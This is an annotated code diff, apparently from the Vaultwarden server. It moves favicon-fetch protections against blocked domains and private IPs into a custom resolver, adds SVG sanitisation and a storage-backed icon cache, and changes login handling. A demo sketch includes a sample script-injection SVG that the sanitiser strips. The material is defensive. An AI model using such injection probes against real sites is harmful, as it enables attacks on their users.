-                && !ip.is_loopback()
-                && !ip.is_link_local()
-                && !ip.is_broadcast()
-                && !ip.is_documentation()
-                && !(ip.octets()[0] == 100 && (ip.octets()[1] & 0b1100_0000 == 0b0100_0000))
-                && !(ip.octets()[0] == 192 && ip.octets()[1] == 0 && ip.octets()[2] == 0)
-                && !(ip.octets()[0] & 240 == 240 && !ip.is_broadcast())
-                && !(ip.octets()[0] == 198 && (ip.octets()[1] & 0xfe) == 18)
-                // Make sure the address is not in 0.0.0.0/8
-                && ip.octets()[0] != 0
-        }
-        IpAddr::V6(ip) => {
-            if ip.is_multicast() && ip.segments()[0] & 0x000f == 14 {
-                true
-            } else {
-                !ip.is_multicast()
-                    && !ip.is_loopback()
-                    && !((ip.segments()[0] & 0xffc0) == 0xfe80)
-                    && !((ip.segments()[0] & 0xfe00) == 0xfc00)
-                    && !ip.is_unspecified()
-                    && !((ip.segments()[0] == 0x2001) && (ip.segments()[1] == 0xdb8))
-            }
-        }
-    }
-}
-
-#[cfg(feature = "unstable")]
-fn is_global(ip: IpAddr) -> bool {
-    ip.is_global()
-}
-
-/// These are some tests to check that the implementations match
-/// The IPv4 can be all checked in 5 mins or so and they are correct as of nightly 2020-07-11
-/// The IPV6 can't be checked in a reasonable time, so we check about ten billion random ones, so far correct
-/// Note that the is_global implementation is subject to change as new IP RFCs are created
-///
-/// To run while showing progress output:
-/// cargo test --features sqlite,unstable -- --nocapture --ignored
-#[cfg(test)]
-#[cfg(feature = "unstable")]
-mod tests {
-    use super::*;
-
-    #[test]
-    #[ignore]
-    fn test_ipv4_global() {
-        for a in 0..u8::MAX {
-            println!("Iter: {}/255", a);
-            for b in 0..u8::MAX {
-                for c in 0..u8::MAX {
-                    for d in 0..u8::MAX {
-                        let ip = IpAddr::V4(std::net::Ipv4Addr::new(a, b, c, d));
-                        assert_eq!(ip.is_global(), is_global(ip))
-                    }
-                }
-            }
-        }
-    }
-
-    #[test]
-    #[ignore]
-    fn test_ipv6_global() {
-        use ring::rand::{SecureRandom, SystemRandom};
-        let mut v = [0u8; 16];
-        let rand = SystemRandom::new();
-        for i in 0..1_000 {
-            println!("Iter: {}/1_000", i);
-            for _ in 0..10_000_000 {
-                rand.fill(&mut v).expect("Error generating random values");
-                let ip = IpAddr::V6(std::net::Ipv6Addr::new(
-                    (v[14] as u16) << 8 | v[15] as u16,
-                    (v[12] as u16) << 8 | v[13] as u16,
-                    (v[10] as u16) << 8 | v[11] as u16,
-                    (v[8] as u16) << 8 | v[9] as u16,
-                    (v[6] as u16) << 8 | v[7] as u16,
-                    (v[4] as u16) << 8 | v[5] as u16,
-                    (v[2] as u16) << 8 | v[3] as u16,
-                    (v[0] as u16) << 8 | v[1] as u16,
-                ));
-                assert_eq!(ip.is_global(), is_global(ip))
-            }
-        }
-    }
-}
-
-#[derive(Clone)]
-enum DomainBlacklistReason {
-    Regex,
-    IP,
-}
-
-use cached::proc_macro::cached;
-#[cached(key = "String", convert = r#"{ domain.to_string() }"#, size = 16, time = 60)]
-async fn check_domain_blacklist_reason(domain: &str) -> Option<DomainBlacklistReason> {
-    // First check the blacklist regex if there is a match.
-    // This prevents the blocked domain(s) from being leaked via a DNS lookup.
-    if let Some(blacklist) = CONFIG.icon_blacklist_regex() {
-        // Use the pre-generate Regex stored in a Lazy HashMap if there's one, else generate it.
-        let is_match = if let Some(regex) = ICON_BLACKLIST_REGEX.get(&blacklist) {
-            regex.is_match(domain)
-        } else {
-            // Clear the current list if the previous key doesn't exists.
-            // To prevent growing of the HashMap after someone has changed it via the admin interface.
-            if ICON_BLACKLIST_REGEX.len() >= 1 {
-                ICON_BLACKLIST_REGEX.clear();
-            }
-
-            // Generate the regex to store in too the Lazy Static HashMap.
-            let blacklist_regex = Regex::new(&blacklist).unwrap();
-            let is_match = blacklist_regex.is_match(domain);
-            ICON_BLACKLIST_REGEX.insert(blacklist.clone(), blacklist_regex);
-
-            is_match
-        };
-
-        if is_match {
-            debug!("Blacklisted domain: {} matched ICON_BLACKLIST_REGEX", domain);
-            return Some(DomainBlacklistReason::Regex);
-        }
-    }
-
-    if CONFIG.icon_blacklist_non_global_ips() {
-        if let Ok(s) = lookup_host((domain, 0)).await {
-            for addr in s {
-                if !is_global(addr.ip()) {
-                    debug!("IP {} for domain '{}' is not a global IP!", addr.ip(), domain);
-                    return Some(DomainBlacklistReason::IP);
-                }
-            }
-        }
-    }
-
-    None
-}
-
 async fn get_icon(domain: &str) -> Option<(Vec<u8>, String)> {
-    let path = format!("{}/{}.png", CONFIG.icon_cache_folder(), domain);
+    let path = format!("{domain}.png");

     // Check for expiration of negatively cached copy
     if icon_is_negcached(&path).await {
@@ -324,10 +183,7 @@ async fn get_icon(domain: &str) -> Option<(Vec<u8>, String)> {
     }

     if let Some(icon) = get_cached_icon(&path).await {
-        let icon_type = match get_icon_type(&icon) {
-            Some(x) => x,
-            _ => "x-icon",
-        };
+        let icon_type = get_icon_type(&icon).unwrap_or("x-icon");
         return Some((icon, icon_type.to_string()));
     }

@@ -338,13 +194,20 @@ async fn get_icon(domain: &str) -> Option<(Vec<u8>, String)> {
     // Get the icon, or None in case of error
     match download_icon(domain).await {
         Ok((icon, icon_type)) => {
-            save_icon(&path, &icon).await;
+            save_icon(&path, icon.to_vec()).await;
             Some((icon.to_vec(), icon_type.unwrap_or("x-icon").to_string()))
         }
         Err(e) => {
-            warn!("Unable to download icon: {:?}", e);
+            // If this error comes from the custom resolver, this means this is a blocked domain
+            // or non global IP, don't save the miss file in this case to avoid leaking it
+            if let Some(error) = CustomHttpClientError::downcast_ref(&e) {
+                warn!("{error}");
+                return None;
+            }
+
+            warn!("Unable to download icon: {e:?}");
             let miss_indicator = path + ".miss";
-            save_icon(&miss_indicator, &[]).await;
+            save_icon(&miss_indicator, vec![]).await;
             None
         }
     }
@@ -357,11 +220,9 @@ async fn get_cached_icon(path: &str) -> Option<Vec<u8>> {
     }

     // Try to read the cached icon, and return it if it exists
-    if let Ok(mut f) = File::open(path).await {
-        let mut buffer = Vec::new();
-
-        if f.read_to_end(&mut buffer).await.is_ok() {
-            return Some(buffer);
+    if let Ok(operator) = CONFIG.opendal_operator_for_path_type(PathType::IconCache) {
+        if let Ok(buf) = operator.read(path).await {
+            return Some(buf.to_vec());
         }
     }

@@ -369,9 +230,11 @@ async fn get_cached_icon(path: &str) -> Option<Vec<u8>> {
 }

 async fn file_is_expired(path: &str, ttl: u64) -> Result<bool, Error> {
-    let meta = symlink_metadata(path).await?;
-    let modified = meta.modified()?;
-    let age = SystemTime::now().duration_since(modified)?;
+    let operator = CONFIG.opendal_operator_for_path_type(PathType::IconCache)?;
+    let meta = operator.stat(path).await?;
+    let modified =
+        meta.last_modified().ok_or_else(|| std::io::Error::other(format!("No last modified time for `{path}`")))?;
+    let age = SystemTime::now().duration_since(modified.into())?;

     Ok(ttl > 0 && ttl <= age.as_secs())
 }
@@ -383,8 +246,13 @@ async fn icon_is_negcached(path: &str) -> bool {
     match expired {
         // No longer negatively cached, drop the marker
         Ok(true) => {
-            if let Err(e) = remove_file(&miss_indicator).await {
-                error!("Could not remove negative cache indicator for icon {:?}: {:?}", path, e);
+            match CONFIG.opendal_operator_for_path_type(PathType::IconCache) {
+                Ok(operator) => {
+                    if let Err(e) = operator.delete(&miss_indicator).await {
+                        error!("Could not remove negative cache indicator for icon {path:?}: {e:?}");
+                    }
+                }
+                Err(e) => error!("Could not remove negative cache indicator for icon {path:?}: {e:?}"),
             }
             false
         }
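The icon cache moves from direct `tokio::fs` calls to an OpenDAL `Operator`, so the same read/write/stat/delete code can target a local folder or remote object storage; note that cache paths become operator-relative (`{domain}.png` instead of `{icon_cache_folder}/{domain}.png`). A minimal sketch of the `Operator` calls used above, assuming a recent `opendal` release with the filesystem backend (the `PathType` plumbing is vaultwarden-specific and omitted):

```rust
use opendal::{services::Fs, Operator};

#[tokio::main]
async fn main() -> opendal::Result<()> {
    // Back the operator with a plain directory; other services (e.g. S3)
    // expose the exact same read/write/stat/delete interface.
    let operator = Operator::new(Fs::default().root("/tmp/icon_cache"))?.finish();

    operator.write("example.com.png", vec![0x89, 0x50, 0x4e, 0x47]).await?;
    let buf = operator.read("example.com.png").await?;
    println!("read {} bytes", buf.to_vec().len());

    let meta = operator.stat("example.com.png").await?;
    println!("last modified: {:?}", meta.last_modified());

    operator.delete("example.com.png").await?;
    Ok(())
}
```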
@@ -414,11 +282,7 @@ impl Icon {
     }
 }

-fn get_favicons_node(
-    dom: InfallibleTokenizer<StringReader<'_>, FaviconEmitter>,
-    icons: &mut Vec<Icon>,
-    url: &url::Url,
-) {
+fn get_favicons_node(dom: Tokenizer<StringReader<'_>, FaviconEmitter>, icons: &mut Vec<Icon>, url: &url::Url) {
     const TAG_LINK: &[u8] = b"link";
     const TAG_BASE: &[u8] = b"base";
     const TAG_HEAD: &[u8] = b"head";
@@ -427,7 +291,7 @@ fn get_favicons_node(

     let mut base_url = url.clone();
     let mut icon_tags: Vec<Tag> = Vec::new();
-    for token in dom {
+    for Ok(token) in dom {
         let tag_name: &[u8] = &token.tag.name;
         match tag_name {
             TAG_LINK => {
@@ -448,9 +312,7 @@ fn get_favicons_node(
             TAG_HEAD if token.closing => {
                 break;
             }
-            _ => {
-                continue;
-            }
+            _ => {}
         }
     }

@@ -476,7 +338,7 @@ struct IconUrlResult {

 /// Returns a IconUrlResult which holds a Vector IconList and a string which holds the referer.
 /// There will always two items within the iconlist which holds http(s)://domain.tld/favicon.ico.
-/// This does not mean that that location does exists, but it is the default location browser use.
+/// This does not mean that location exists, but it is the default location the browser uses.
 ///
 /// # Argument
 /// * `domain` - A string which holds the domain with extension.
@@ -491,42 +353,48 @@ async fn get_icon_url(domain: &str) -> Result<IconUrlResult, Error> {
     let ssldomain = format!("https://{domain}");
     let httpdomain = format!("http://{domain}");

-    // First check the domain as given during the request for both HTTPS and HTTP.
-    let resp = match get_page(&ssldomain).or_else(|_| get_page(&httpdomain)).await {
-        Ok(c) => Ok(c),
-        Err(e) => {
-            let mut sub_resp = Err(e);
-
-            // When the domain is not an IP, and has more then one dot, remove all subdomains.
-            let is_ip = domain.parse::<IpAddr>();
-            if is_ip.is_err() && domain.matches('.').count() > 1 {
-                let mut domain_parts = domain.split('.');
-                let base_domain = format!(
-                    "{base}.{tld}",
-                    tld = domain_parts.next_back().unwrap(),
-                    base = domain_parts.next_back().unwrap()
-                );
-                if is_valid_domain(&base_domain) {
-                    let sslbase = format!("https://{base_domain}");
-                    let httpbase = format!("http://{base_domain}");
-                    debug!("[get_icon_url]: Trying without subdomains '{base_domain}'");
-
-                    sub_resp = get_page(&sslbase).or_else(|_| get_page(&httpbase)).await;
-                }
-
-            // When the domain is not an IP, and has less then 2 dots, try to add www. infront of it.
-            } else if is_ip.is_err() && domain.matches('.').count() < 2 {
-                let www_domain = format!("www.{domain}");
-                if is_valid_domain(&www_domain) {
-                    let sslwww = format!("https://{www_domain}");
-                    let httpwww = format!("http://{www_domain}");
-                    debug!("[get_icon_url]: Trying with www. prefix '{www_domain}'");
-
-                    sub_resp = get_page(&sslwww).or_else(|_| get_page(&httpwww)).await;
-                }
-            }
-            sub_resp
-        }
+    // First check the domain as given during the request for HTTPS.
+    let resp = match get_page(&ssldomain).await {
+        Err(e) if CustomHttpClientError::downcast_ref(&e).is_none() => {
+            // If we get an error that is not caused by the blacklist, we retry with HTTP
+            match get_page(&httpdomain).await {
+                mut sub_resp @ Err(_) => {
+                    // When the domain is not an IP, and has more then one dot, remove all subdomains.
+                    let is_ip = domain.parse::<IpAddr>();
+                    if is_ip.is_err() && domain.matches('.').count() > 1 {
+                        let mut domain_parts = domain.split('.');
+                        let base_domain = format!(
+                            "{base}.{tld}",
+                            tld = domain_parts.next_back().unwrap(),
+                            base = domain_parts.next_back().unwrap()
+                        );
+                        if is_valid_domain(&base_domain) {
+                            let sslbase = format!("https://{base_domain}");
+                            let httpbase = format!("http://{base_domain}");
+                            debug!("[get_icon_url]: Trying without subdomains '{base_domain}'");
+
+                            sub_resp = get_page(&sslbase).or_else(|_| get_page(&httpbase)).await;
+                        }
+
+                    // When the domain is not an IP, and has less then 2 dots, try to add www. infront of it.
+                    } else if is_ip.is_err() && domain.matches('.').count() < 2 {
+                        let www_domain = format!("www.{domain}");
+                        if is_valid_domain(&www_domain) {
+                            let sslwww = format!("https://{www_domain}");
+                            let httpwww = format!("http://{www_domain}");
+                            debug!("[get_icon_url]: Trying with www. prefix '{www_domain}'");
+
+                            sub_resp = get_page(&sslwww).or_else(|_| get_page(&httpwww)).await;
+                        }
+                    }
+                    sub_resp
+                }
+                res => res,
+            }
+        }
+
+        // If we get a result or a blacklist error, just continue
+        res => res,
     };

     // Create the iconlist
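The fallback ladder above (HTTPS, then HTTP, then the domain without subdomains, then a `www.` prefix) is easier to see in isolation. A small self-contained sketch of the same candidate-generation logic (illustration only, not the vaultwarden function):

```rust
use std::net::IpAddr;

// Illustrative only: derive the fallback hosts get_icon_url would probe
// when the original domain does not answer.
fn fallback_candidates(domain: &str) -> Vec<String> {
    let mut candidates = Vec::new();
    let is_ip = domain.parse::<IpAddr>().is_ok();
    let dots = domain.matches('.').count();

    if !is_ip && dots > 1 {
        // "icons.cdn.example.com" -> "example.com"
        let mut parts = domain.split('.');
        let tld = parts.next_back().unwrap();
        let base = parts.next_back().unwrap();
        candidates.push(format!("{base}.{tld}"));
    } else if !is_ip && dots < 2 {
        // "example.com" -> "www.example.com"
        candidates.push(format!("www.{domain}"));
    }
    candidates
}

fn main() {
    assert_eq!(fallback_candidates("icons.cdn.example.com"), ["example.com"]);
    assert_eq!(fallback_candidates("example.com"), ["www.example.com"]);
}
```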
@@ -548,7 +416,7 @@ async fn get_icon_url(domain: &str) -> Result<IconUrlResult, Error> {
         // 384KB should be more than enough for the HTML, though as we only really need the HTML header.
         let limited_reader = stream_to_bytes_limit(content, 384 * 1024).await?.to_vec();

-        let dom = Tokenizer::new_with_emitter(limited_reader.to_reader(), FaviconEmitter::default()).infallible();
+        let dom = Tokenizer::new_with_emitter(limited_reader.to_reader(), FaviconEmitter::default());
         get_favicons_node(dom, &mut iconlist, &url);
     } else {
         // Add the default favicon.ico to the list with just the given domain
@@ -573,21 +441,12 @@ async fn get_page(url: &str) -> Result<Response, Error> {
 }

 async fn get_page_with_referer(url: &str, referer: &str) -> Result<Response, Error> {
-    match check_domain_blacklist_reason(url::Url::parse(url).unwrap().host_str().unwrap_or_default()).await {
-        Some(DomainBlacklistReason::Regex) => warn!("Favicon '{}' is from a blacklisted domain!", url),
-        Some(DomainBlacklistReason::IP) => warn!("Favicon '{}' is hosted on a non-global IP!", url),
-        None => (),
-    }
-
     let mut client = CLIENT.get(url);
     if !referer.is_empty() {
         client = client.header("Referer", referer)
     }

-    match client.send().await {
-        Ok(c) => c.error_for_status().map_err(Into::into),
-        Err(e) => err_silent!(format!("{e}")),
-    }
+    Ok(client.send().await?.error_for_status()?)
 }

 /// Returns a Integer with the priority of the type of the icon which to prefer.
@@ -603,6 +462,9 @@ async fn get_page_with_referer(url: &str, referer: &str) -> Result<Response, Err
 /// priority2 = get_icon_priority("https://example.com/path/to/a/favicon.ico", "");
 /// ```
 fn get_icon_priority(href: &str, sizes: &str) -> u8 {
+    static PRIORITY_MAP: Lazy<HashMap<&'static str, u8>> =
+        Lazy::new(|| [(".png", 10), (".jpg", 20), (".jpeg", 20)].into_iter().collect());
+
     // Check if there is a dimension set
     let (width, height) = parse_sizes(sizes);

@@ -627,13 +489,9 @@ fn get_icon_priority(href: &str, sizes: &str) -> u8 {
             200
         }
     } else {
-        // Change priority by file extension
-        if href.ends_with(".png") {
-            10
-        } else if href.ends_with(".jpg") || href.ends_with(".jpeg") {
-            20
-        } else {
-            30
-        }
+        match href.rsplit_once('.') {
+            Some((_, extension)) => PRIORITY_MAP.get(&*extension.to_ascii_lowercase()).copied().unwrap_or(30),
+            None => 30,
+        }
     }
 }
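The extension ranking is now table-driven and case-insensitive instead of a chain of `ends_with` checks; lower numbers mean higher preference. A quick standalone sketch of the same idea (dotless keys here for simplicity, so this is an illustration rather than the exact lookup above):

```rust
use std::collections::HashMap;

fn main() {
    // Extension -> priority, lower is better; unknown extensions get 30.
    let priority_map: HashMap<&str, u8> = [("png", 10), ("jpg", 20), ("jpeg", 20)].into_iter().collect();

    for href in ["/favicon.PNG", "/logo.jpeg", "/icon.gif", "favicon"] {
        let prio = match href.rsplit_once('.') {
            // to_ascii_lowercase makes ".PNG" and ".png" rank the same.
            Some((_, ext)) => priority_map.get(ext.to_ascii_lowercase().as_str()).copied().unwrap_or(30),
            None => 30,
        };
        println!("{href} -> {prio}");
    }
}
```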
@@ -670,12 +528,6 @@ fn parse_sizes(sizes: &str) -> (u16, u16) {
 }

 async fn download_icon(domain: &str) -> Result<(Bytes, Option<&str>), Error> {
-    match check_domain_blacklist_reason(domain).await {
-        Some(DomainBlacklistReason::Regex) => err_silent!("Domain is blacklisted", domain),
-        Some(DomainBlacklistReason::IP) => err_silent!("Host resolves to a non-global IP", domain),
-        None => (),
-    }
-
     let icon_result = get_icon_url(domain).await?;

     let mut buffer = Bytes::new();
@@ -700,10 +552,10 @@ async fn download_icon(domain: &str) -> Result<(Bytes, Option<&str>), Error> {
                         // Check if the icon type is allowed, else try an icon from the list.
                         icon_type = get_icon_type(&body);
                         if icon_type.is_none() {
-                            debug!("Icon from {} data:image uri, is not a valid image type", domain);
+                            debug!("Icon from {domain} data:image uri, is not a valid image type");
                             continue;
                         }
-                        info!("Extracted icon from data:image uri for {}", domain);
+                        info!("Extracted icon from data:image uri for {domain}");
                         buffer = body.freeze();
                         break;
                     }
@@ -711,47 +563,64 @@ async fn download_icon(domain: &str) -> Result<(Bytes, Option<&str>), Error> {
                     _ => debug!("Extracted icon from data:image uri is invalid"),
                 };
             } else {
-                match get_page_with_referer(&icon.href, &icon_result.referer).await {
-                    Ok(res) => {
-                        buffer = stream_to_bytes_limit(res, 5120 * 1024).await?; // 5120KB/5MB for each icon max (Same as icons.bitwarden.net)
-
-                        // Check if the icon type is allowed, else try an icon from the list.
-                        icon_type = get_icon_type(&buffer);
-                        if icon_type.is_none() {
-                            buffer.clear();
-                            debug!("Icon from {}, is not a valid image type", icon.href);
-                            continue;
-                        }
-                        info!("Downloaded icon from {}", icon.href);
-                        break;
-                    }
-                    Err(e) => debug!("{:?}", e),
-                };
+                let res = get_page_with_referer(&icon.href, &icon_result.referer).await?;
+
+                buffer = stream_to_bytes_limit(res, 5120 * 1024).await?; // 5120KB/5MB for each icon max (Same as icons.bitwarden.net)
+
+                // Check if the icon type is allowed, else try an icon from the list.
+                icon_type = get_icon_type(&buffer);
+                if icon_type.is_none() {
+                    buffer.clear();
+                    debug!("Icon from {}, is not a valid image type", icon.href);
+                    continue;
+                }
+                info!("Downloaded icon from {}", icon.href);
+                break;
             }
         }
     }

     if buffer.is_empty() {
         err_silent!("Empty response or unable find a valid icon", domain);
+    } else if icon_type == Some("svg+xml") {
+        let mut svg_filter = Filter::new();
+        svg_filter.set_data_url_filter(data_url_filter::allow_standard_images);
+        let mut sanitized_svg = Vec::new();
+        if svg_filter.filter(&*buffer, &mut sanitized_svg).is_err() {
+            icon_type = None;
+            buffer.clear();
+        } else {
+            buffer = sanitized_svg.into();
+        }
     }

     Ok((buffer, icon_type))
 }

-async fn save_icon(path: &str, icon: &[u8]) {
-    match File::create(path).await {
-        Ok(mut f) => {
-            f.write_all(icon).await.expect("Error writing icon file");
-        }
-        Err(ref e) if e.kind() == std::io::ErrorKind::NotFound => {
-            create_dir_all(&CONFIG.icon_cache_folder()).await.expect("Error creating icon cache folder");
-        }
+async fn save_icon(path: &str, icon: Vec<u8>) {
+    let operator = match CONFIG.opendal_operator_for_path_type(PathType::IconCache) {
+        Ok(operator) => operator,
         Err(e) => {
-            warn!("Unable to save icon: {:?}", e);
+            warn!("Failed to get OpenDAL operator while saving icon: {e}");
+            return;
         }
+    };
+
+    if let Err(e) = operator.write(path, icon).await {
+        warn!("Unable to save icon: {e:?}");
     }
 }

 fn get_icon_type(bytes: &[u8]) -> Option<&'static str> {
+    fn check_svg_after_xml_declaration(bytes: &[u8]) -> Option<&'static str> {
+        // Look for SVG tag within the first 1KB
+        if let Ok(content) = std::str::from_utf8(&bytes[..bytes.len().min(1024)]) {
+            if content.contains("<svg") || content.contains("<SVG") {
+                return Some("svg+xml");
+            }
+        }
+        None
+    }
+
     match bytes {
         [137, 80, 78, 71, ..] => Some("png"),
         [0, 0, 1, 0, ..] => Some("x-icon"),
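Downloaded SVGs are now passed through `svg_hush` before being cached, which strips scripting and external references that would otherwise make a hostile favicon dangerous to serve back to clients. A minimal standalone sketch using the same crate calls as the hunk above (`Filter::new`, `set_data_url_filter`, `filter`):

```rust
use svg_hush::{data_url_filter, Filter};

fn main() {
    let dirty = br#"<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script><rect width="1" height="1"/></svg>"#;

    let mut filter = Filter::new();
    // Only allow standard raster image data: URLs to survive sanitization.
    filter.set_data_url_filter(data_url_filter::allow_standard_images);

    let mut clean = Vec::new();
    match filter.filter(&dirty[..], &mut clean) {
        // The <script> element is gone from the sanitized output.
        Ok(()) => println!("{}", String::from_utf8_lossy(&clean)),
        // Mirroring the code above: on failure, drop the icon entirely.
        Err(e) => eprintln!("dropping icon, sanitization failed: {e}"),
    }
}
```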
@@ -759,6 +628,8 @@ fn get_icon_type(bytes: &[u8]) -> Option<&'static str> {
         [255, 216, 255, ..] => Some("jpeg"),
         [71, 73, 70, 56, ..] => Some("gif"),
         [66, 77, ..] => Some("bmp"),
+        [60, 115, 118, 103, ..] => Some("svg+xml"), // Normal svg
+        [60, 63, 120, 109, 108, ..] => check_svg_after_xml_declaration(bytes), // An svg starting with <?xml
         _ => None,
     }
 }
@@ -770,6 +641,12 @@ async fn stream_to_bytes_limit(res: Response, max_size: usize) -> Result<Bytes,
     let mut buf = BytesMut::new();
     let mut size = 0;
     while let Some(chunk) = stream.next().await {
+        // It is possible that there might occure UnexpectedEof errors or others
+        // This is most of the time no issue, and if there is no chunked data anymore or at all parsing the HTML will not happen anyway.
+        // Therfore if chunk is an err, just break and continue with the data be have received.
+        if chunk.is_err() {
+            break;
+        }
         let chunk = &chunk?;
         size += chunk.len();
         buf.extend(chunk);
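`get_icon_type` sniffs the real content type from leading magic bytes rather than trusting the server's `Content-Type` header; the two new arms recognize SVGs that start with `<svg` or with an `<?xml` declaration. A reduced standalone sketch of the same slice-pattern idea:

```rust
// Reduced re-implementation for illustration; the real function handles more formats.
fn sniff(bytes: &[u8]) -> Option<&'static str> {
    match bytes {
        [137, 80, 78, 71, ..] => Some("png"),           // \x89PNG
        [60, 115, 118, 103, ..] => Some("svg+xml"),     // "<svg"
        [60, 63, 120, 109, 108, ..] => Some("svg+xml"), // "<?xml" (real code then scans for <svg)
        _ => None,
    }
}

fn main() {
    assert_eq!(sniff(b"\x89PNG\r\n\x1a\n"), Some("png"));
    assert_eq!(sniff(b"<svg xmlns='http://www.w3.org/2000/svg'>"), Some("svg+xml"));
    assert_eq!(sniff(b"GIF89a"), None); // not covered in this reduced sketch
}
```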
@@ -789,7 +666,7 @@ use cookie_store::CookieStore;
 pub struct Jar(std::sync::RwLock<CookieStore>);

 impl reqwest::cookie::CookieStore for Jar {
-    fn set_cookies(&self, cookie_headers: &mut dyn Iterator<Item = &header::HeaderValue>, url: &url::Url) {
+    fn set_cookies(&self, cookie_headers: &mut dyn Iterator<Item = &HeaderValue>, url: &url::Url) {
         use cookie::{Cookie as RawCookie, ParseError as RawCookieParseError};
         use time::Duration;

@@ -808,7 +685,7 @@ impl reqwest::cookie::CookieStore for Jar {
         cookie_store.store_response_cookies(cookies, url);
     }

-    fn cookies(&self, url: &url::Url) -> Option<header::HeaderValue> {
+    fn cookies(&self, url: &url::Url) -> Option<HeaderValue> {
         let cookie_store = self.0.read().unwrap();
         let s = cookie_store
             .get_request_values(url)
@@ -820,7 +697,7 @@ impl reqwest::cookie::CookieStore for Jar {
             return None;
         }

-        header::HeaderValue::from_maybe_shared(Bytes::from(s)).ok()
+        HeaderValue::from_maybe_shared(Bytes::from(s)).ok()
     }
 }

@@ -828,7 +705,7 @@ impl reqwest::cookie::CookieStore for Jar {
 /// The FaviconEmitter is using an optimized version of the DefaultEmitter.
 /// This prevents emitting tags like comments, doctype and also strings between the tags.
 /// But it will also only emit the tags we need and only if they have the correct attributes
-/// Therefor parsing the HTML content is faster.
+/// Therefore parsing the HTML content is faster.
 use std::collections::BTreeMap;

 #[derive(Default)]
src/api/identity.rs
@@ -12,26 +12,32 @@ use crate::{
         core::{
             accounts::{PreloginData, RegisterData, _prelogin, _register},
             log_user_event,
-            two_factor::{authenticator, duo, email, enforce_2fa_policy, webauthn, yubikey},
+            two_factor::{authenticator, duo, duo_oidc, email, enforce_2fa_policy, webauthn, yubikey},
         },
+        master_password_policy,
         push::register_push_device,
-        ApiResult, EmptyResult, JsonResult, JsonUpcase,
+        ApiResult, EmptyResult, JsonResult,
     },
-    auth::{generate_organization_api_key_login_claims, ClientHeaders, ClientIp},
+    auth::{generate_organization_api_key_login_claims, ClientHeaders, ClientIp, ClientVersion},
     db::{models::*, DbConn},
     error::MapResult,
     mail, util, CONFIG,
 };

 pub fn routes() -> Vec<Route> {
-    routes![login, prelogin, identity_register]
+    routes![login, prelogin, identity_register, register_verification_email, register_finish]
 }

 #[post("/connect/token", data = "<data>")]
-async fn login(data: Form<ConnectData>, client_header: ClientHeaders, mut conn: DbConn) -> JsonResult {
+async fn login(
+    data: Form<ConnectData>,
+    client_header: ClientHeaders,
+    client_version: Option<ClientVersion>,
+    mut conn: DbConn,
+) -> JsonResult {
     let data: ConnectData = data.into_inner();

-    let mut user_uuid: Option<String> = None;
+    let mut user_id: Option<UserId> = None;

     let login_result = match data.grant_type.as_ref() {
         "refresh_token" => {
@@ -48,7 +54,7 @@ async fn login(data: Form<ConnectData>, client_header: ClientHeaders, mut conn:
             _check_is_some(&data.device_name, "device_name cannot be blank")?;
             _check_is_some(&data.device_type, "device_type cannot be blank")?;

-            _password_login(data, &mut user_uuid, &mut conn, &client_header.ip).await
+            _password_login(data, &mut user_id, &mut conn, &client_header.ip, &client_version).await
         }
         "client_credentials" => {
             _check_is_some(&data.client_id, "client_id cannot be blank")?;
@@ -59,17 +65,17 @@ async fn login(data: Form<ConnectData>, client_header: ClientHeaders, mut conn:
             _check_is_some(&data.device_name, "device_name cannot be blank")?;
             _check_is_some(&data.device_type, "device_type cannot be blank")?;

-            _api_key_login(data, &mut user_uuid, &mut conn, &client_header.ip).await
+            _api_key_login(data, &mut user_id, &mut conn, &client_header.ip).await
         }
         t => err!("Invalid type", t),
     };

-    if let Some(user_uuid) = user_uuid {
+    if let Some(user_id) = user_id {
         match &login_result {
             Ok(_) => {
                 log_user_event(
                     EventType::UserLoggedIn as i32,
-                    &user_uuid,
+                    &user_id,
                     client_header.device_type,
                     &client_header.ip.ip,
                     &mut conn,
@@ -80,7 +86,7 @@ async fn login(data: Form<ConnectData>, client_header: ClientHeaders, mut conn:
                 if let Some(ev) = e.get_event() {
                     log_user_event(
                         ev.event as i32,
-                        &user_uuid,
+                        &user_id,
                         client_header.device_type,
                         &client_header.ip.ip,
                         &mut conn,
@@ -111,8 +117,8 @@ async fn _refresh_login(data: ConnectData, conn: &mut DbConn) -> JsonResult {
     // Because this might get used in the future, and is add by the Bitwarden Server, lets keep it, but then commented out
     // See: https://github.com/dani-garcia/vaultwarden/issues/4156
     // ---
-    // let orgs = UserOrganization::find_confirmed_by_user(&user.uuid, conn).await;
-    let (access_token, expires_in) = device.refresh_tokens(&user, scope_vec);
+    // let members = Membership::find_confirmed_by_user(&user.uuid, conn).await;
+    let (access_token, expires_in) = device.refresh_tokens(&user, scope_vec, data.client_id);
     device.save(conn).await?;

     let result = json!({
@@ -120,16 +126,8 @@ async fn _refresh_login(data: ConnectData, conn: &mut DbConn) -> JsonResult {
         "expires_in": expires_in,
         "token_type": "Bearer",
         "refresh_token": device.refresh_token,
-        "Key": user.akey,
-        "PrivateKey": user.private_key,
-
-        "Kdf": user.client_kdf_type,
-        "KdfIterations": user.client_kdf_iter,
-        "KdfMemory": user.client_kdf_memory,
-        "KdfParallelism": user.client_kdf_parallelism,
-        "ResetMasterPassword": false, // TODO: according to official server seems something like: user.password_hash.is_empty(), but would need testing
         "scope": scope,
-        "unofficialServer": true,
     });

     Ok(Json(result))
@@ -137,9 +135,10 @@ async fn _refresh_login(data: ConnectData, conn: &mut DbConn) -> JsonResult {

 async fn _password_login(
     data: ConnectData,
-    user_uuid: &mut Option<String>,
+    user_id: &mut Option<UserId>,
     conn: &mut DbConn,
     ip: &ClientIp,
+    client_version: &Option<ClientVersion>,
 ) -> JsonResult {
     // Validate scope
     let scope = data.scope.as_ref().unwrap();
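`Option<String>` becomes `Option<UserId>` throughout the login path; vaultwarden introduced typed ID newtypes so a user id cannot silently be confused with some other string-shaped id. A rough sketch of the pattern (the real definition lives in the models and derives considerably more, e.g. serde and diesel traits):

```rust
use std::fmt;

// Sketch of a typed-ID newtype; illustration only.
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
struct UserId(String);

impl fmt::Display for UserId {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        self.0.fmt(f)
    }
}

fn log_login(user_id: &UserId) {
    println!("user {user_id} logged in");
}

fn main() {
    let uid = UserId("00000000-0000-0000-0000-000000000000".into());
    log_login(&uid);
    // log_login(&"raw-string"); // would not compile: that is the point of the newtype
}
```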
@@ -153,31 +152,50 @@ async fn _password_login(

     // Get the user
     let username = data.username.as_ref().unwrap().trim();
-    let mut user = match User::find_by_mail(username, conn).await {
-        Some(user) => user,
